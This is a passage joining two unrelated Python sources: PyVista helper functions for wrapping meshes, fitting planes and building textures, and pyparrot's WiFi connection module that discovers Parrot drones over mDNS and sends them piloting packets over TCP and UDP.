raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(obj):
"""Test if passed object is instance of ``meshio.Mesh``.
Parameters
----------
obj
Any object.
Returns
-------
bool
``True`` if ``obj`` is an ``meshio.Mesh``.
"""
try:
import meshio
return isinstance(obj, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
* 3D :class:`meshio.Mesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
pyvista.DataSet
The PyVista wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object.
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object.
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
# Return if None
if dataset is None:
return
# Check if dataset is a numpy array. We do this first since
# pyvista_ndarray contains a VTK type that we don't want to
# directly wrap.
if isinstance(dataset, (np.ndarray, pyvista.pyvista_ndarray)):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
raise NotImplementedError('NumPy array could not be wrapped pyvista.')
# wrap VTK arrays as pyvista_ndarray
if isinstance(dataset, _vtk.vtkDataArray):
return pyvista.pyvista_ndarray(dataset)
# Check if a dataset is a VTK type
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
try:
return pyvista._wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return
# wrap meshio
if is_meshio_mesh(dataset):
return from_meshio(dataset)
# wrap trimesh
if dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
# otherwise, flag tell the user we can't wrap this object
raise NotImplementedError(f'Unable to wrap ({type(dataset)}) into a pyvista type.')
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.
Parameters
----------
image : pyvista.UniformGrid or vtkImageData
Image to convert.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture.
Parameters
----------
image : numpy.ndarray
Numpy image array.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
Parameters
----------
point : sequence
Three item cartesian point (i.e. ``[x, y, z]``).
bounds : sequence
Six item bounds in the form of ``(xMin, xMax, yMin, yMax, zMin, zMax)``.
Returns
-------
bool
``True`` when ``point`` is inside ``bounds``.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points using the SVD algorithm.
Parameters
----------
points : sequence
Size ``[N x 3]`` sequence of points to fit a plane through.
return_meta : bool, optional
If ``True``, also returns the center and normal used to
generate the plane.
Returns
-------
pyvista.PolyData
Plane mesh.
numpy.ndarray
Plane center if ``return_meta=True``.
numpy.ndarray
Plane normal if ``return_meta=True``.
Examples
--------
Fit a plane to a random point cloud.
>>> import pyvista
>>> import numpy as np
>>> cloud = np.random.random((10, 3))
>>> cloud[:, 2] *= 0.1
>>> plane, center, normal = pyvista.fit_plane_to_points(cloud, return_meta=True)
Plot the fitted plane.
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(plane, color='tan', style='wireframe', line_width=4)
>>> _ = pl.add_points(cloud, render_points_as_spheres=True,
... color='r', point_size=30)
>>> pl.show()
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, dataset):
"""Raise exception about inconsistencies.
Parameters
----------
scalars : numpy.ndarray
Array of scalars.
dataset : pyvista.DataSet
Dataset to check against.
Raises
------
ValueError
Raises a ValueError if the size of scalars does not the dataset.
"""
if isinstance(dataset, _vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({dataset.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) '
f'must match either the number of points ({dataset.n_points}) '
f'or the number of cells ({dataset.n_cells}).')
def generate_plane(normal, origin):
"""Return a _vtk.vtkPlane.
Parameters
----------
normal : sequence
Three item sequence representing the normal of the plane.
origin : sequence
Three item sequence representing the origin of the plane.
Returns
-------
vtk.vtkPlane
VTK plane.
"""
plane = _vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement.
Parameters
----------
func : callable
Callable object.
*args
Any arguments.
"""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the
current environment. Returns ``True`` if depth peeling is
available and has been successfully leveraged, otherwise
``False``.
Parameters
----------
number_of_peels : int, optional
Maximum number of depth peels.
occlusion_ratio : float, optional
Occlusion ratio.
Returns
-------
bool
``True`` when system supports depth peeling with the specified
settings.
"""
# Try Depth Peeling with a basic scene
source = _vtk.vtkSphereSource()
mapper = _vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = _vtk.vtkRenderer()
renderWindow = _vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread.
Parameters
----------
fn : callable
Callable object.
Returns
-------
function
Wrapped function.
"""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods.
Parameters
----------
dec
Decorator
condition
Condition to match.
"""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
This must be use in a ``with`` context and it will block keyboard
interrupts from happening until the exit event as interrupts will crash
the kernel if the VTK algorithm is still executing.
Parameters
----------
algorithm
VTK algorithm or filter.
message : str, optional
Message to display in the progress bar.
scaling : float, optional
Unused keyword argument.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = _vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Preventing a class from being instantiated similar to abc.ABCMeta
but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If `True`, the angle is interpreted as degrees instead of
radians. Default is `True`.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {
'x': (1, 0, 0),
'y': (0, 1, 0),
'z': (0, 0, 1)
}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
def cubemap(path='', prefix='', ext='.jpg'):
"""Construct a cubemap from 6 images.
Each of the 6 images must be in the following format:
- <prefix>negx<ext>
- <prefix>negy<ext>
- <prefix>negz<ext>
- <prefix>posx<ext>
- <prefix>posy<ext>
- <prefix>posz<ext>
Prefix may be empty, and extension will default to ``'.jpg'``
For example, if you have 6 images with the skybox2 prefix:
- ``'skybox2-negx.jpg'``
- ``'skybox2-negy.jpg'``
- ``'skybox2-negz.jpg'``
- ``'skybox2-posx.jpg'``
- ``'skybox2-posy.jpg'``
- ``'skybox2-posz.jpg'``
Parameters
----------
path : str, optional
Directory containing the cubemap images.
prefix : str, optional
Prefix to the filename.
ext : str, optional
The filename extension. For example ``'.jpg'``.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
>>> import pyvista
>>> skybox = pyvista.cubemap('my_directory', 'skybox', '.jpeg') # doctest:+SKIP
"""
sets = ['posx', 'negx', 'posy', 'negy', 'posz', 'negz']
image_paths = [os.path.join(path, f'{prefix}{suffix}{ext}') for suffix in sets]
for image_path in image_paths:
if not os.path.isfile(image_path):
file_str = '\n'.join(image_paths)
raise FileNotFoundError(f'Unable to locate {image_path}\n'
'Expected to find the following files:\n'
f'{file_str}')
texture = pyvista.Texture()
texture.SetMipmap(True)
texture.SetInterpolate(True)
texture.cube_map = True # Must be set prior to setting images
# add each image to the cubemap
for i, fn in enumerate(image_paths):
image = pyvista.read(fn)
flip = _vtk.vtkImageFlip()
flip.SetInputDataObject(image)
flip.SetFilteredAxis(1) # flip y axis
flip.Update()
texture.SetInputDataObject(i, flip.GetOutput())
return texture
|
wifiConnection.py
|
"""
Holds all the data and commands needed to fly a Bebop drone.
Author: Amy McGovern, dramymcgovern@gmail.com
"""
from zeroconf import ServiceBrowser, Zeroconf
from datetime import datetime
import time
import socket
import ipaddress
import json
from pyparrot.utils.colorPrint import color_print
import struct
import threading
from pyparrot.commandsandsensors.DroneSensorParser import get_data_format_and_size
class mDNSListener(object):
"""
This is adapted from the listener code at
https://pypi.python.org/pypi/zeroconf
"""
def __init__(self, wifi_connection):
self.wifi_connection = wifi_connection
def remove_service(self, zeroconf, type, name):
#print("Service %s removed" % (name,))
pass
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
print("Service %s added, service info: %s" % (name, info))
self.wifi_connection._connect_listener_called(info)
class WifiConnection:
def __init__(self, drone, drone_type="Bebop2"):
"""
Can be a connection to a Bebop, Bebop2 or a Mambo right now
:param type: type of drone to connect to
"""
self.is_connected = False
if (drone_type not in ("Bebop", "Bebop2", "Mambo")):
color_print("Error: only type Bebop and Mambo are currently supported", "ERROR")
return
self.drone = drone
self.drone_type = drone_type
self.udp_send_port = 44444 # defined during the handshake except not on Mambo after 3.0.26 firmware
self.udp_receive_port = 43210
self.is_listening = True # for the UDP listener
if (drone_type is "Bebop"):
self.mdns_address = "_arsdk-0901._udp.local."
#Bebop video streaming
self.stream_port = 55004
self.stream_control_port = 55005
elif (drone_type is "Bebop2"):
self.mdns_address = "_arsdk-090c._udp.local."
#Bebop video streaming
self.stream_port = 55004
self.stream_control_port = 55005
elif (drone_type is "Mambo"):
self.mdns_address = "_arsdk-090b._udp.local."
# map of the data types by name (for outgoing packets)
self.data_types_by_name = {
'ACK' : 1,
'DATA_NO_ACK': 2,
'LOW_LATENCY_DATA': 3,
'DATA_WITH_ACK' : 4
}
# map of the incoming data types by number (to figure out if we need to ack etc)
self.data_types_by_number = {
1 : 'ACK',
2 : 'DATA_NO_ACK',
3 : 'LOW_LATENCY_DATA',
4 : 'DATA_WITH_ACK'
}
self.sequence_counter = {
'PONG': 0,
'SEND_NO_ACK': 0,
'SEND_WITH_ACK': 0,
'SEND_HIGH_PRIORITY': 0,
'VIDEO_ACK': 0,
'ACK_DRONE_DATA': 0,
'NO_ACK_DRONE_DATA': 0,
'VIDEO_DATA': 0,
}
self.buffer_ids = {
'PING': 0, # pings from device
'PONG': 1, # respond to pings
'SEND_NO_ACK': 10, # not-ack commandsandsensors (piloting and camera rotations)
'SEND_WITH_ACK': 11, # ack commandsandsensors (all piloting commandsandsensors)
'SEND_HIGH_PRIORITY': 12, # emergency commandsandsensors
'VIDEO_ACK': 13, # ack for video
'ACK_DRONE_DATA' : 127, # drone data that needs an ack
'NO_ACK_DRONE_DATA' : 126, # data from drone (including battery and others), no ack
'VIDEO_DATA' : 125, # video data
'ACK_FROM_SEND_WITH_ACK': 139 # 128 + buffer id for 'SEND_WITH_ACK' is 139
}
self.data_buffers = (self.buffer_ids['ACK_DRONE_DATA'], self.buffer_ids['NO_ACK_DRONE_DATA'])
# store whether a command was acked
self.command_received = {
'SEND_WITH_ACK': False,
'SEND_HIGH_PRIORITY': False,
'ACK_COMMAND': False
}
# maximum number of times to try a packet before assuming it failed
self.max_packet_retries = 1
# threading lock for waiting
self._lock = threading.Lock()
def connect(self, num_retries):
"""
Connects to the drone
:param num_retries: maximum number of retries
:return: True if the connection succeeded and False otherwise
"""
if ("Mambo" not in self.drone_type):
print("Setting up mDNS listener since this is not a Mambo")
#parrot's latest mambo firmware (3.0.26 broke all of the mDNS services so this is (temporarily) commented
#out but it is backwards compatible and will work with the hard-coded addresses for now.
zeroconf = Zeroconf()
listener = mDNSListener(self)
print("Making a browser for %s" % self.mdns_address)
browser = ServiceBrowser(zeroconf, self.mdns_address , listener)
# basically have to sleep until the info comes through on the listener
num_tries = 0
while (num_tries < num_retries and not self.is_connected):
time.sleep(1)
num_tries += 1
# if we didn't hear the listener, return False
if (not self.is_connected):
color_print("connection failed: did you remember to connect your machine to the Drone's wifi network?", "ERROR")
return False
else:
browser.cancel()
# perform the handshake and get the UDP info
handshake = self._handshake(num_retries)
if (handshake):
self._create_udp_connection()
self.listener_thread = threading.Thread(target=self._listen_socket)
self.listener_thread.start()
color_print("Success in setting up the wifi network to the drone!", "SUCCESS")
return True
else:
color_print("Error: TCP handshake failed.", "ERROR")
return False
def _listen_socket(self):
"""
Listens to the socket and sleeps in between receives.
Runs forever (until disconnect is called)
"""
print("starting listening at ")
data = None
while (self.is_listening):
try:
(data, address) = self.udp_receive_sock.recvfrom(66000)
except socket.timeout:
print("timeout - trying again")
except:
pass
self.handle_data(data)
color_print("disconnecting", "INFO")
self.disconnect()
def handle_data(self, data):
"""
Handles the data as it comes in
:param data: raw data packet
:return:
"""
# got the idea to of how to handle this data nicely (handling the perhaps extra data in the packets)
# and unpacking the critical info first (id, size etc) from
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
my_data = data
while (my_data):
#print("inside loop to handle data ")
(data_type, buffer_id, packet_seq_id, packet_size) = struct.unpack('<BBBI', my_data[0:7])
recv_data = my_data[7:packet_size]
#print("\tgot a data type of of %d " % data_type)
#print("\tgot a buffer id of of %d " % buffer_id)
#print("\tgot a packet seq id of of %d " % packet_seq_id)
#print("\tsize is %d" % packet_size)
self.handle_frame(data_type, buffer_id, packet_seq_id, recv_data)
# loop in case there is more data
my_data = my_data[packet_size:]
#print("assigned more data")
#print("ended loop handling data")
def handle_frame(self, packet_type, buffer_id, packet_seq_id, recv_data):
if (buffer_id == self.buffer_ids['PING']):
#color_print("this is a ping! need to pong", "INFO")
self._send_pong(recv_data)
if (self.data_types_by_number[packet_type] == 'ACK'):
#print("setting command received to true")
ack_seq = int(struct.unpack("<B", recv_data)[0])
self._set_command_received('SEND_WITH_ACK', True, ack_seq)
self.ack_packet(buffer_id, ack_seq)
elif (self.data_types_by_number[packet_type] == 'DATA_NO_ACK'):
#print("DATA NO ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=False)
elif (self.data_types_by_number[packet_type] == 'LOW_LATENCY_DATA'):
print("Need to handle Low latency data")
elif (self.data_types_by_number[packet_type] == 'DATA_WITH_ACK'):
#print("DATA WITH ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=True)
else:
color_print("HELP ME", "ERROR")
print("got a different type of data - help")
def _send_pong(self, data):
"""
Send a PONG back to a PING
:param data: data that needs to be PONG/ACK'd
:return: nothing
"""
size = len(data)
self.sequence_counter['PONG'] = (self.sequence_counter['PONG'] + 1) % 256
packet = struct.pack("<BBBI", self.data_types_by_name['DATA_NO_ACK'], self.buffer_ids['PONG'],
self.sequence_counter['PONG'], size + 7)
packet += data
self.safe_send(packet)
def _set_command_received(self, channel, val, seq_id):
"""
Set the command received on the specified channel to the specified value (used for acks)
:param channel: channel
:param val: True or False
:return:
"""
self.command_received[(channel, seq_id)] = val
def _is_command_received(self, channel, seq_id):
"""
Is the command received?
:param channel: channel it was sent on
:param seq_id: sequence id of the command
:return:
"""
return self.command_received[(channel, seq_id)]
def _handshake(self, num_retries):
"""
Performs the handshake over TCP to get all the connection info
:return: True if it worked and False otherwise
"""
# create the TCP socket for the handshake
tcp_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
#print (self.connection_info.address, self.connection_info.port)
#print(ipaddress.IPv4Address(self.connection_info.address))
# connect
# handle the broken mambo firmware by hard-coding the port and IP address
if ("Mambo" in self.drone_type):
self.drone_ip = "192.168.99.3"
tcp_sock.connect(("192.168.99.3", 44444))
else:
self.drone_ip = ipaddress.IPv4Address(self.connection_info.address).exploded
tcp_sock.connect((self.drone_ip, self.connection_info.port))
# send the handshake information
if(self.drone_type in ("Bebop", "Bebop2")):
# For Bebop add video stream ports to the json request
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot",
"arstream2_client_stream_port":self.stream_port,
"arstream2_client_control_port":self.stream_control_port})
else:
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot"})
json_obj = json.loads(json_string)
print(json_string)
try:
# python 3
tcp_sock.send(bytes(json_string, 'utf-8'))
except:
# python 2
tcp_sock.send(json_string)
# wait for the response
finished = False
num_try = 0
while (not finished and num_try < num_retries):
data = tcp_sock.recv(4096).decode('utf-8')
if (len(data) > 0):
my_data = data[0:-1]
self.udp_data = json.loads(str(my_data))
# if the drone refuses the connection, return false
if (self.udp_data['status'] != 0):
return False
print(self.udp_data)
self.udp_send_port = self.udp_data['c2d_port']
print("c2d_port is %d" % self.udp_send_port)
finished = True
else:
num_try += 1
# cleanup
tcp_sock.close()
return finished
def _create_udp_connection(self):
"""
Create the UDP connection
"""
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
self.udp_receive_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# don't use the connect, use bind instead
# learned from bybop code
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
#self.udp_receive_sock.connect((self.drone_ip, self.udp_receive_port))
self.udp_receive_sock.settimeout(5.0)
#Some computers having connection refused error (error was some kind of that, I dont remember actually)
#These new setsockopt lines solving it (at least at my device)
self.udp_receive_sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.udp_send_sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.udp_receive_sock.bind(('0.0.0.0', int(self.udp_receive_port)))
def _connect_listener_called(self, connection_info):
"""
Save the connection info and set the connected to be true. This si called within the listener
for the connection.
:param connection_info:
:return:
"""
self.connection_info = connection_info
self.is_connected = True
def disconnect(self):
"""
Disconnect cleanly from the sockets
"""
self.is_listening = False
# Sleep for a moment to allow all socket activity to cease before closing
# This helps to avoids a Winsock error regarding a operations on a closed socket
self.smart_sleep(0.5)
# then put the close in a try/except to catch any further winsock errors
# the errors seem to be mostly occurring on windows for some reason
try:
self.udp_receive_sock.close()
self.udp_send_sock.close()
except:
pass
def safe_send(self, packet):
packet_sent = False
#print "inside safe send"
try_num = 0
while (not packet_sent and try_num < self.max_packet_retries):
try:
self.udp_send_sock.sendto(packet, (self.drone_ip, self.udp_send_port))
packet_sent = True
except:
#print "resetting connection"
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
try_num += 1
def send_command_packet_ack(self, packet, seq_id):
"""
Sends the actual packet on the ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
self._set_command_received('SEND_WITH_ACK', False, seq_id)
while (try_num < self.max_packet_retries and not self._is_command_received('SEND_WITH_ACK', seq_id)):
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
try_num += 1
self.smart_sleep(0.5)
return self._is_command_received('SEND_WITH_ACK', seq_id)
def send_command_packet_noack(self, packet):
"""
Sends the actual packet on the No-ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
def send_noparam_high_priority_command_packet(self, command_tuple):
"""
Send a no parameter command packet on the high priority channel
:param command_tuple:
:return:
"""
self.sequence_counter['SEND_HIGH_PRIORITY'] = (self.sequence_counter['SEND_HIGH_PRIORITY'] + 1) % 256
packet = struct.pack("<BBBIBBH", self.data_types_by_name['LOW_LATENCY_DATA'],
self.buffer_ids['SEND_HIGH_PRIORITY'],
self.sequence_counter['SEND_HIGH_PRIORITY'], 11,
command_tuple[0], command_tuple[1], command_tuple[2])
self.safe_send(packet)
def send_noparam_command_packet_ack(self, command_tuple):
"""
Send a no parameter command packet on the ack channel
:param command_tuple:
:return:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBH", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 11,
command_tuple[0], command_tuple[1], command_tuple[2])
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_param_command_packet(self, command_tuple, param_tuple=None, param_type_tuple=0,ack=True):
"""
Send a command packet with parameters. Ack channel is optional for future flexibility,
but currently commands are always send over the Ack channel so it defaults to True.
Contributed by awm102 on github
:param: command_tuple: the command tuple derived from command_parser.get_command_tuple()
:param: param_tuple (optional): the parameter values to be sent (can be found in the XML files)
:param: param_size_tuple (optional): a tuple of strings representing the data type of the parameters
e.g. u8, float etc. (can be found in the XML files)
:param: ack (optional): allows ack to be turned off if required
:return:
"""
# TODO: This function could potentially be extended to encompass send_noparam_command_packet_ack
# and send_enum_command_packet_ack if desired for more modular code.
# TODO: The function could be improved by looking up the parameter data types in the xml files
# in the same way the send_enum_command_packet_ack does.
# Create lists to store the number of bytes and pack chars needed for parameters
# Default them to zero so that if no params are provided the packet size is correct
param_size_list = [0] * len(param_tuple)
pack_char_list = [0] * len(param_tuple)
if param_tuple is not None:
# Fetch the parameter sizes. By looping over the param_tuple we only get the data
# for requested parameters so a mismatch in params and types does not matter
for i,param in enumerate(param_tuple):
pack_char_list[i], param_size_list[i] = get_data_format_and_size(param, param_type_tuple[i])
if ack:
ack_string = 'SEND_WITH_ACK'
data_ack_string = 'DATA_WITH_ACK'
else:
ack_string = 'SEND_NO_ACK'
data_ack_string = 'DATA_NO_ACK'
# Construct the base packet
self.sequence_counter[ack_string] = (self.sequence_counter[ack_string] + 1) % 256
# Calculate packet size:
# base packet <BBBIBBH is 11 bytes, param_size_list can be added up
packet_size = 11 + sum(param_size_list)
packet = struct.pack("<BBBIBBH", self.data_types_by_name[data_ack_string],
self.buffer_ids[ack_string],
self.sequence_counter[ack_string], packet_size,
command_tuple[0], command_tuple[1], command_tuple[2])
if param_tuple is not None:
# Add in the parameter values based on their sizes
for i,param in enumerate(param_tuple):
packet += struct.pack(pack_char_list[i],param)
if ack:
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
else:
return self.send_command_packet_noack(packet)
def send_single_pcmd_command(self, command_tuple, roll, pitch, yaw, vertical_movement):
"""
Send a single PCMD command with the specified roll, pitch, and yaw. Note
this will not make that command run forever. Instead it sends ONCE. This can be used
in a loop (in your agent) that makes more smooth control than using the duration option.
:param command_tuple: command tuple per the parser
:param roll:
:param pitch:
:param yaw:
:param vertical_movement:
"""
self.sequence_counter['SEND_NO_ACK'] = (self.sequence_counter['SEND_NO_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHBbbbbI",
self.data_types_by_name['DATA_NO_ACK'],
self.buffer_ids['SEND_NO_ACK'],
self.sequence_counter['SEND_NO_ACK'],
20,
command_tuple[0], command_tuple[1], command_tuple[2],
1, roll, pitch, yaw, vertical_movement, 0)
